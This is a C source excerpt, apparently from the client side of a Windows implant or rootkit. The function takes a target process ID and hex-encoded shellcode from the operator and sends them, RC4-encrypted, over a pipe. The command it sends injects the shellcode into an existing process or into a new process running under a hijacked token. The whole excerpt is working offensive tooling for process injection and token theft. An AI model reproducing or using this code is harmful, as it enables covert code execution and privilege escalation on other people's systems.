in client.c [411:460]
void cl_inject_process(bool open_process, bool is_64, HANDLE pipe)
{
assert(INVALID_HANDLE_VALUE != pipe);
char hexlified_shellcode[MAX_SIZE] = { 0 };
packet_t* packet = NULL;
shellcode_t* shellcode = NULL;
uint8_t* binary_shellcode = NULL;
uint32_t target_pid = 0;
size_t shellcode_size = 0;
printf("Enter in existing PID: ");
while (!scanf_s("%d", &target_pid) || !target_pid)
printf("Please enter a valid PID\n");
h_get_user_string("Enter in shellcode: ", hexlified_shellcode, MAX_SIZE);
binary_shellcode =
h_bytes_from_hexlified(hexlified_shellcode, &shellcode_size);
shellcode = (shellcode_t*)calloc(1, sizeof(shellcode_t) + shellcode_size);
if (!shellcode)
h_error("Failed to allocate shellcode memory\n");
shellcode->pid = target_pid;
memcpy_s(shellcode->buffer, shellcode_size, binary_shellcode, shellcode_size);
comm_send_command(
pipe,
open_process
? (is_64
? OPEN_PROCESS_AND_INJECT_SHELLCODE_64BITS
: OPEN_PROCESS_AND_INJECT_SHELLCODE_32BITS)
: (is_64
? CREATE_RANDOM_PROCESS_WITH_HIJACKED_TOKEN_AND_INJECT_SHELLCODE_64BITS
: CREATE_RANDOM_PROCESS_WITH_HIJACKED_TOKEN_AND_INJECT_SHELLCODE_32BITS),
(uint8_t*)shellcode, (uint32_t)(sizeof(shellcode_t) + shellcode_size),
RC4_KEY, RC4_KEY_LENGTH);
packet = comm_receive_packet(pipe);
cl_print_packet(packet);
if (packet)
free(packet);
if (shellcode)
free(shellcode);
if (binary_shellcode)
free(binary_shellcode);
}